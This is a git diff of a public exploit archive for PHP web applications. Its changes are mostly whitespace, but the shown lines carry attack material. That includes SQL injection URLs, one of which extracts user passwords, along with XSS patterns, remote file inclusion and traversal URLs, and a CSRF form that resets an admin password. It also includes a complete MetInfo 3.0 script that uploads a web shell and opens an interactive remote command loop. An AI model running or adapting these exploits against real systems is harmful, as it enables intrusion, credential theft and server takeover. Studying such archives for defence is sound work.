 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
 Name : PGAUTOPro SQLi and XSS Vulnerability
@@ -46,7 +46,7 @@ advertisirs, placing your own AdSense contextual ads will let you derive profit
 
 Xploit: SQLi Vulnerability
 
-DEMO  
+DEMO  
 
 URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl
 
@@ -55,9 +55,9 @@ e%2Fbuy_do_search&page=[SQLi]
 ###############################################################################################################
 Xploit: XSS Vulnerability
 
-  Attack Pattern: '"-->
+  Attack Pattern: '"-->
 
-  http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
+  http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
 
 
 ###############################################################################################################
diff --git a/exploits/php/webapps/13892.txt b/exploits/php/webapps/13892.txt
index 7fe867d2a..8bec9d7b3 100644
--- a/exploits/php/webapps/13892.txt
+++ b/exploits/php/webapps/13892.txt
@@ -1,12 +1,12 @@
 Name : PHPAuctionSystem Upload Vulnerability
 Date : june, 16 2010
 Vendor url :http://www.phpauctions.info/
-Critical Level     : HIGH
+Critical Level     : HIGH
 Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
 special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
 greetz to :All ICW members and my friends :) luv y0 guyz 
 #######################################################################################################
- 
+ 
 
 PHPAuctionSystem had various vulnerablities which was found 
 
@@ -15,17 +15,17 @@ PHPAuctionSystem had various vulnerablities which was found
 
 Xploit:Upload Vulnerability
 
- Step 1: register as a user :)
- 
- Step 2: goto "sell an item" option
+ Step 1: register as a user :)
+ 
+ Step 2: goto "sell an item" option
 
- DEMO URL :http://[site]/select_category.php?
+ DEMO URL :http://[site]/select_category.php?
 
- Step 3: post ur evil-code in the item description 
+ Step 3: post ur evil-code in the item description 
 
- Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
+ Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
 
- demo url :http://[site]/sell.php :)
+ demo url :http://[site]/sell.php :)
 
 
 ###############################################################################################################
diff --git a/exploits/php/webapps/13922.txt b/exploits/php/webapps/13922.txt
index 90e3f5958..11fe3a489 100644
--- a/exploits/php/webapps/13922.txt
+++ b/exploits/php/webapps/13922.txt
@@ -1,6 +1,6 @@
 Date : june, 18 2010
 Vendor url :http://www.axxis.gr/
-Critical Level     : HIGH
+Critical Level     : HIGH
 Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
 special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
 greetz to :All ICW members and my friends :) luv y0 guyz 
@@ -32,8 +32,8 @@ Xploit:Persistent xss Vulnerability
 Step 1 : As always register as a user :P
 
 Step 2 : Goto your profile..you will able to see "What's on your mind PRO module:"
-  
-         INsert your evil XSS script or xss shell ;) and voila 
+  
+         INsert your evil XSS script or xss shell ;) and voila 
 
 DEMO URL :http://[site]/index.php?option=com_content&view=frontpage&setLang=en-GB&Itemid=1
 
diff --git a/exploits/php/webapps/13938.html b/exploits/php/webapps/13938.html
index 6c255356c..950c2e598 100644
--- a/exploits/php/webapps/13938.html
+++ b/exploits/php/webapps/13938.html
@@ -39,7 +39,7 @@ HackTalk Security
 
 </tr>
 <tr style="display:none;">
-<td> </td>
+<td> </td>
 <td style="font-size: 10px;">
 Please note: You should only enter values in the above fields if you wish to change this users password
 </td>
@@ -80,7 +80,7 @@ Please note: You should only enter values in the above fields if you wish to cha
 </tr>
 <tr>
 
-<td> </td>
+<td> </td>
 <td>
 <input type="radio" name="active[]" id="active" value="1" checked="checked" />
 <label for="active">Active</label>
@@ -90,7 +90,7 @@ Please note: You should only enter values in the above fields if you wish to cha
 </tr>
 
 <tr>
-<td> </td>
+<td> </td>
 <td>
 <input type="submit" name="submit" value="Add" />
 <input type="reset" name="reset" value="Reset" />
diff --git a/exploits/php/webapps/13999.html b/exploits/php/webapps/13999.html
index 657c12818..33e28a729 100644
--- a/exploits/php/webapps/13999.html
+++ b/exploits/php/webapps/13999.html
@@ -87,7 +87,7 @@ return(true);
 <INPUT NAME=userfile SIZE=30 TYPE=file   MaxFileSize="1000000"> 
 <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
   </TD></TR>
-  <TR><TD> </TD></TR>
+  <TR><TD> </TD></TR>
   <TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
 <TR><TD>NOTE: Please be patient, you will not receive any notification until the 
 file is completely transferred.<BR><BR></TD></TR>
diff --git a/exploits/php/webapps/14147.txt b/exploits/php/webapps/14147.txt
index 868b437ac..9735f9f15 100644
--- a/exploits/php/webapps/14147.txt
+++ b/exploits/php/webapps/14147.txt
@@ -16,8 +16,8 @@ admin panel for managing your forum. Also includes support for
 categories, plugins, languages, and themes."
 
 # Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
-        - Mail: security[AT]adeo.com.tr
-        - Web: http://security.adeo.com.tr
+        - Mail: security[AT]adeo.com.tr
+        - Web: http://security.adeo.com.tr
 
 # Vulnerability:
 If administrator of the board browse PoC attacker can gain privilege
diff --git a/exploits/php/webapps/14415.html b/exploits/php/webapps/14415.html
index f57197ebf..d3aef4a34 100644
--- a/exploits/php/webapps/14415.html
+++ b/exploits/php/webapps/14415.html
@@ -35,7 +35,7 @@ EZ-Oscommerce 3.1 Remote File Upload
 
 FILE NAME:<br> 
 
-<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
+<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 
 
 <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; 
 
diff --git a/exploits/php/webapps/14439.txt b/exploits/php/webapps/14439.txt
index d6dbdebb7..e953fdb44 100644
--- a/exploits/php/webapps/14439.txt
+++ b/exploits/php/webapps/14439.txt
@@ -2,33 +2,33 @@
 phpBazar admin information discloser Vulnerability
 =====================================
 
-Author                 :: Net_Spy
-Group                  :: Aras cyber Army
-Email                  :: tvc82_2002@yahoo.com
-Discover               :: 1 july 2010
-Critical Lvl           :: M
-Published              :: 22 july 2010
-Vendor                 :: http://www.smartisoft.com/
+Author                 :: Net_Spy
+Group                  :: Aras cyber Army
+Email                  :: tvc82_2002@yahoo.com
+Discover               :: 1 july 2010
+Critical Lvl           :: M
+Published              :: 22 july 2010
+Vendor                 :: http://www.smartisoft.com/
 ---------------------------------------------------------------------------
 ~~~~~~~~~
 
-Dork                   :: intitle: phpBazar-AdminPanel
+Dork                   :: intitle: phpBazar-AdminPanel
 
 ~~~~~~~~~~~~~~~~~~
 
-demo                   :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
-                         
+demo                   :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
+                         
 
 ~~~~~~~~~~~~~~~~~~~~~~~~~
 
-Example Just For Edu   :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
-             
-              
+Example Just For Edu   :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
+             
+              
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 +++++++++++++++++++++++++++++++++++++++
 [!] greetiz to ::
-    DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
-    All aras cyber amry members
-   
+    DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
+    All aras cyber amry members
+   
 +++++++++++++++++++++++++++++++++++++++
\ No newline at end of file
diff --git a/exploits/php/webapps/14459.txt b/exploits/php/webapps/14459.txt
index 550cad766..e68ef0d62 100644
--- a/exploits/php/webapps/14459.txt
+++ b/exploits/php/webapps/14459.txt
@@ -33,8 +33,8 @@ Detail :
 						$title = $lang['saved_search'];
 					}
 					$display .= '<a href="index.php?action=searchresults&' . $misc->make_db_unsafe
-					($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a> 
-					   <div class="note"><a href="index.php?action=delete_search&
+					($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a> 
+					   <div class="note"><a href="index.php?action=delete_search&
 					searchID=' . $misc->make_db_unsafe($recordSet->fields['usersavedsearches_id']) . '" 
 					onclick="return confirmDelete()">' . $lang['delete_search'] . '</a></div><br /><br />';
 
diff --git a/exploits/php/webapps/14639.txt b/exploits/php/webapps/14639.txt
index 9870df8cf..a0aa4777e 100644
--- a/exploits/php/webapps/14639.txt
+++ b/exploits/php/webapps/14639.txt
@@ -1,12 +1,12 @@
 # Exploit Title: [MailForm Remote File Include ] 
 # Date: [14-8-2010] 
-# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
 # Software Link: [http://scripts.bdr130.net/files/any/MailForm.zip] 
 # Version: [v 1.2 ] 
 # Tested on: [Windows XP] 
 # CVE : [هكر المسيب] 
-#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L]
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
\ No newline at end of file
diff --git a/exploits/php/webapps/14712.txt b/exploits/php/webapps/14712.txt
index bf976a690..91c67fa12 100644
--- a/exploits/php/webapps/14712.txt
+++ b/exploits/php/webapps/14712.txt
@@ -1,12 +1,12 @@
 # Exploit Title: [4images1.7.8 Remote File Include ] 
 # Date: [23-8-2010] 
-# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
 # Software Link: [http://www.4homepages.de/4images/download.php] 
 # Version: [v 1.7.8 ] 
 # Tested on: [Windows XP] 
 # CVE : 
-#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
\ No newline at end of file
diff --git a/exploits/php/webapps/14799.txt b/exploits/php/webapps/14799.txt
index 4ad24e780..1872b2435 100644
--- a/exploits/php/webapps/14799.txt
+++ b/exploits/php/webapps/14799.txt
@@ -1,12 +1,12 @@
 # Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ] 
 # Date: [26-8-2010] 
-# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
 # Software Link: [http://www.oscommerce.com/solutions/downloads] 
 # Version: [v 3.0 ] 
 # Tested on: [Windows XP] 
 # CVE :
-#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
- +++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +++++++++++++++++++++++++++++++++++++++++++++++++++++
 A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
\ No newline at end of file
diff --git a/exploits/php/webapps/14819.html b/exploits/php/webapps/14819.html
index 6425c405f..c3edfbc1a 100644
--- a/exploits/php/webapps/14819.html
+++ b/exploits/php/webapps/14819.html
@@ -8,24 +8,24 @@
 <body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
 <p
  align="left"><font size="5" 
-color="#FFFFFF"><b>                                
+color="#FFFFFF"><b>                                
  
-               
+               
 </b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin 
 Exploit<br>
-                                                                  
-    
+                                                                  
+    
 Author : RENO<br>
-                                                         
-     TeaM : SauDi ViRuS TeaM<br>
-                                                           
-    
+                                                         
+     TeaM : SauDi ViRuS TeaM<br>
+                                                           
+    
 Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
-                                                       
-      
+                                                       
+      
 Email : R7e@HoTMaiL.coM</font></b></p>
-<p align="center"> </p>
-<p align="center"> </p>
+<p align="center"> </p>
+<p align="center"> </p>
 
 <svt>
 <center>
diff --git a/exploits/php/webapps/14822.txt b/exploits/php/webapps/14822.txt
index 0c2be4137..9bc3c709a 100644
--- a/exploits/php/webapps/14822.txt
+++ b/exploits/php/webapps/14822.txt
@@ -1,6 +1,6 @@
 # Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ] 
 # Date: [28-8-2010] 
-# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
 # Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html] 
 # Version: [v 1.0 ] 
 # Tested on: [Windows XP] 
diff --git a/exploits/php/webapps/14896.txt b/exploits/php/webapps/14896.txt
index 896ca888d..48798f8c0 100644
--- a/exploits/php/webapps/14896.txt
+++ b/exploits/php/webapps/14896.txt
@@ -1,6 +1,6 @@
 # Exploit Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion ] 
 # Date: [5-9-2010] 
-# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
+# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
 # Software Link: [http://www.ijoomla.com/ijoomla-magazine/ijoomla-magazine/index/] 
 # Version: [v 3.0.1 ] 
 # Tested on: [Windows XP] 
@@ -9,4 +9,4 @@
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~] 
-Greetings:  No
\ No newline at end of file
+Greetings:  No
\ No newline at end of file
diff --git a/exploits/php/webapps/14931.php b/exploits/php/webapps/14931.php
index 1ffd98e25..10f621735 100644
--- a/exploits/php/webapps/14931.php
+++ b/exploits/php/webapps/14931.php
@@ -2,17 +2,17 @@
 Date : Sep 6, 2010
 Author: Saxtor {Location: South America (Guyana)}
 Email: admin@saxtorinc.com
-Category::  Web Applications  
+Category::  Web Applications  
 Verison: 5.5
 
 
 suffers a directory traversal
-vulnerability.  This vulnerability could allow
+vulnerability.  This vulnerability could allow
 attackers to read arbitrary files => 
 ------------------------------
 http://localhost/Javabridge/source.php?source=/etc/passwd
 ------------------------------
- */
+ */
 <?php
 
  /**
diff --git a/exploits/php/webapps/14965.txt b/exploits/php/webapps/14965.txt
index 3c7531fc7..b0cb1a303 100644
--- a/exploits/php/webapps/14965.txt
+++ b/exploits/php/webapps/14965.txt
@@ -1,6 +1,6 @@
 [x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ] 
 [x] Date: 10-9-2010] 
-[x] Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
+[x] Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
 [x] Software Link: [http://www.familycms.com/getstarted.php] 
 [x] Version: [v 2.2.3 ] 
 [x]Tested on: [Windows XP] 
@@ -11,4 +11,4 @@
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 [x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL]
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
-[x]Greetings:  No Greet
\ No newline at end of file
+[x]Greetings:  No Greet
\ No newline at end of file
diff --git a/exploits/php/webapps/15389.php b/exploits/php/webapps/15389.php
index d3eedbdd1..087f6621c 100644
--- a/exploits/php/webapps/15389.php
+++ b/exploits/php/webapps/15389.php
@@ -19,34 +19,34 @@ set_time_limit(0);
 ini_set("default_socket_timeout", 5);
 function http_send($host, $packet)
 {
- $sock = fsockopen($host, 80);
- while (!$sock)
- {
-  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
- }
- fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
- return $resp;
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+  print "\n[-] No response from {$host}:80 Trying again...";
+  $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
 }
 print "\n+------------------------------------------------------------+";
-print "\n|        MetInfo 3.0 File Upload (fckeditor) sh3n            |";
+print "\n|        MetInfo 3.0 File Upload (fckeditor) sh3n            |";
 print "\n+------------------------------------------------------------+\n";
 if ($argc < 2)
 {
- print "\nUsage......: php $argv[0] metinfo.pe path";
- print "\nExample....: php $argv[0] localhost /fckeditor/\n";
- die();
+ print "\nUsage......: php $argv[0] metinfo.pe path";
+ print "\nExample....: php $argv[0] localhost /fckeditor/\n";
+ die();
 }
 $host = $argv[1];
 $path = $argv[2];
-$data  = "--xSsT0rm\r\n";
+$data  = "--xSsT0rm\r\n";
 $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh3n.php.pdf\"\r\n";
 $data .= "Content-Type: application/octet-stream\r\n\r\n";
 $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
 $data .= "----xSsT0rm--\r\n";
-$packet  = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
+$packet  = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
 $packet .= "Host: {$host}\r\n";
 $packet .= "Content-Length: ".strlen($data)."\r\n";
 $packet .= "Content-Type: multipart/form-data; boundary=xSsT0rm\r\n";
@@ -58,19 +58,19 @@ else print "\n[-] Shell uploaded to {$html[2]}...have phun!\n";
 define(STDIN, fopen("php://stdin", "r"));
 while(1)
 {
- print "\nsh3n-box# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
-  $packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
- }
- else break;
+ print "\nsh3n-box# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+  $packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
+  $packet.= "Host: {$host}\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Connection: close\r\n\r\n";
+  $output = http_send($host, $packet);
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  $shell = explode("_code_", $output);
+  print "\n{$shell[1]}";
+ }
+ else break;
 }
 ?>
\ No newline at end of file
diff --git a/exploits/php/webapps/15470.txt b/exploits/php/webapps/15470.txt
index 116d91f4d..f8bef4d49 100644
--- a/exploits/php/webapps/15470.txt
+++ b/exploits/php/webapps/15470.txt
@@ -8,4 +8,4 @@ Sql Injection :
 http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
 ################################################################################################################
 Thanks Cyber-Warrior.org  &  AKINCILAR 
-################################################################################################################ 
\ No newline at end of file
+################################################################################################################
\ No newline at end of file
diff --git a/exploits/php/webapps/15472.txt b/exploits/php/webapps/15472.txt
index 741aacf43..0f8f95fca 100644
--- a/exploits/php/webapps/15472.txt
+++ b/exploits/php/webapps/15472.txt
@@ -18,7 +18,7 @@ Description: Change the admin password of the admin panel of oscommerce.And then
 <form name="administrator" action="http:/server/linktoadminpanel/administrators.php/login.php?aID=1&action=save" method="post"> Change Admin Pass
     Username<br><input type="text" name="username" value="admin">
     <br>Password<br><input type="password" name="password" maxlength="40"></td> 
-    <br><input type="submit" alt="Update" title=" Update " value="Change It!">     <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1">    </a>
+    <br><input type="submit" alt="Update" title=" Update " value="Change It!">     <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1">    </a>
 </form> 
 </BODY></HTML>
 ----------------------------
diff --git a/exploits/php/webapps/15510.txt b/exploits/php/webapps/15510.txt
index fbf9fc522..4ab2ad9dd 100644
--- a/exploits/php/webapps/15510.txt
+++ b/exploits/php/webapps/15510.txt
@@ -1,6 +1,6 @@
 [+]Exploit Title: [awcm v2.1 final Remote File Inclusion]
 [+]Date: [13-11-2010]
-[+]Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
+[+]Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
 [+]Software Link: [www.awcm-cms.com]
 [+]Version: [v2.1]
 [+]CVE :I'M IRaQi ~ Hacker town of Musayyib
@@ -12,4 +12,4 @@ http://sourceforge.net/projects/awcm/files/
 [+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L] 
 
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Greetings:  No Greet  !_!
\ No newline at end of file
+Greetings:  No Greet  !_!
\ No newline at end of file
diff --git a/exploits/php/webapps/15685.html b/exploits/php/webapps/15685.html
index d176741d1..bc5584c35 100644
--- a/exploits/php/webapps/15685.html
+++ b/exploits/php/webapps/15685.html
@@ -104,7 +104,7 @@ Hide Email ? (Email Göster Gizle)
 	<td class="liste-veri3" bgcolor="#ffffff" align="left">
 <label style="cursor: pointer;">
 <input type=radio name="posta_goster" value="1" >
-Evet</label>  
+Evet</label>  
 <label style="cursor: pointer;">
 <input type="radio" name="posta_goster" value="0" checked="checked">
 Hayýr</label>
@@ -115,7 +115,7 @@ Doðum tarihi
 	<td class="liste-veri3" bgcolor="#ffffff" align="left">
 <label style="cursor: pointer;">
 <input type="radio" name="dogum_tarihi_goster" value="1" checked="checked">
-Evet</label>  
+Evet</label>  
 
 <label style="cursor: pointer;">
 <input type="radio" name="dogum_tarihi_goster" value="0" >
@@ -127,7 +127,7 @@ Sehir Göster Gizle
 	<td class="liste-veri3" bgcolor="#ffffff" align="left">
 <label style="cursor: pointer;">
 <input type="radio" name="sehir_goster" value="1" checked="checked">
-Evet</label>  
+Evet</label>  
 
 <label style="cursor: pointer;">
 
@@ -145,7 +145,7 @@ Online - Offline Göster Gizle
 <label style="cursor: pointer;">
 
 <input type="radio" name="gizli" value="0" checked="checked">
-Evet</label>  
+Evet</label>  
 
 <label style="cursor: pointer;">
 <input type="radio" name="gizli" value="1" >
diff --git a/exploits/php/webapps/15824.txt b/exploits/php/webapps/15824.txt
index f7372d56e..6726022fc 100644
--- a/exploits/php/webapps/15824.txt
+++ b/exploits/php/webapps/15824.txt
@@ -4,7 +4,7 @@ Special thanks to Eric Heikkinen for patching these quickly.
 
 Blind SQL Injection
 http://host/pligg_1.1.2/search.php?adv=1&status=
-'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
+'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
 +&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0
 
 XSS:
diff --git a/exploits/php/webapps/15838.php b/exploits/php/webapps/15838.php
index cc46b6bf0..210508fda 100644
--- a/exploits/php/webapps/15838.php
+++ b/exploits/php/webapps/15838.php
@@ -16,7 +16,7 @@ The target must be a link to the document root of OpenClassifieds<br>
 (If the exploit doesn't immediately reload then blind sqli is
 required,  which will take a few minutes  ;)<br>
 <form>
-	Target:  <input size=128 name=target value="http://localhost/"><br>
+	Target:  <input size=128 name=target value="http://localhost/"><br>
 	Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
 	<input type=submit value="Attack">
 </form><br>
diff --git a/exploits/php/webapps/15857.txt b/exploits/php/webapps/15857.txt
index 3f98398e8..73e125620 100644
--- a/exploits/php/webapps/15857.txt
+++ b/exploits/php/webapps/15857.txt
@@ -401,7 +401,7 @@ report.php
 		$url = " .$_SERVER[PHP_SELF]";
 		$count = $row[0];
 		$perpage = 40;list($pagertop, $pagerbottom, $limit) = pager($perpage, $count, $url);
-		print("<BR><b> Current Email Bans ($count)</b>\n");
+		print("<BR><b> Current Email Bans ($count)</b>\n");
 
 		$url isn't filtered and pager() does not filter anything. So it's vulnerable to XSS.
 		
diff --git a/exploits/php/webapps/15902.html b/exploits/php/webapps/15902.html
index 828c4ed4e..e0c5b4f06 100644
--- a/exploits/php/webapps/15902.html
+++ b/exploits/php/webapps/15902.html
@@ -27,11 +27,11 @@ expl:
     </tr>
     <tr>
       <td align="left" valign="top">Root URL address of your site (with end slash)</td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td align="left" valign="top"><input name="home" type="text" class="validate[required] field" id="home" style="width:99%" value="http://www.dgdfgfgdfgdgdfgfdfgdf.com" /></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td colspan="2" align="left" valign="top">Your slogan</td>
@@ -90,19 +90,19 @@ expl:
     </tr>
     <tr>
       <td align="left" valign="top">Password-----just 6 characters</td></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td align="left" valign="top"><input name="pass" type="password" class="validate[required,length[6,24]] field" id="pass" style="width:99%" value="123456" /></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td align="left" valign="top">Password again-----just 6 characters</td></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td align="left" valign="top"><input name="passco" type="password" class="validate[required,confirm[pass]] field" id="passco" style="width:99%" value="123456" /></td>
-      <td align="left" valign="top"> </td>
+      <td align="left" valign="top"> </td>
     </tr>
     <tr>
       <td colspan="2" align="left" valign="top"><input name="installed" type="hidden" id="installed" value="true" />
@@ -113,7 +113,7 @@ expl:
       <td colspan="2" align="center" valign="top"><input type="submit" name="button" id="button" value="Save" class="save" /></td>
     </tr>
     <tr>
-      <td colspan="2" align="center" valign="top"> </td>
+      <td colspan="2" align="center" valign="top"> </td>
     </tr>
   </table>
 </form>
diff --git a/exploits/php/webapps/16060.txt b/exploits/php/webapps/16060.txt
index 66e237a39..c1cdf4772 100644
--- a/exploits/php/webapps/16060.txt
+++ b/exploits/php/webapps/16060.txt
@@ -12,12 +12,12 @@
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
 Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
 Xarnuz, Truenex
- 
- 
- 
+ 
+ 
+ 
 [POC]
 http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
- 
+ 
 http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
 
 [SQL Injection]
diff --git a/exploits/php/webapps/16116.txt b/exploits/php/webapps/16116.txt
index 3e084a32f..743d970bb 100644
--- a/exploits/php/webapps/16116.txt
+++ b/exploits/php/webapps/16116.txt
@@ -17,7 +17,7 @@ Xarnuz, Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick
 Jordan,Animacco,
 yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
 Rodrix, l0ve, her0
- 
+ 
 
 [Qcodo Exploit]
 
diff --git a/exploits/php/webapps/16127.txt b/exploits/php/webapps/16127.txt
index 129d5d538..6758d8ed6 100644
--- a/exploits/php/webapps/16127.txt
+++ b/exploits/php/webapps/16127.txt
@@ -6,7 +6,7 @@
 # Software: http://www.telematica.com.ar/tcms.asp
 # http://www.telematica.com.ar/portfolio.asp
 # Tested on: Linux
- 
+ 
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
 Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
@@ -15,8 +15,8 @@ Jordan,Animacco ,
 yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
 Rodrix, l0ve, NetT0xic,
 Gusan0r, Sabertrail, Maxi Soler. Darioxchx,r0dr1,Zer0-Zo0rg
- 
-  
+ 
+  
 [Authentication Bypass]
 
 http://path/admin/
diff --git a/exploits/php/webapps/17170.txt b/exploits/php/webapps/17170.txt
index 326364d83..f5ba8cb8b 100644
--- a/exploits/php/webapps/17170.txt
+++ b/exploits/php/webapps/17170.txt
@@ -75,7 +75,7 @@ EZ-Shop is prone to SQL Injection due to insufficent user supplied input sanizat
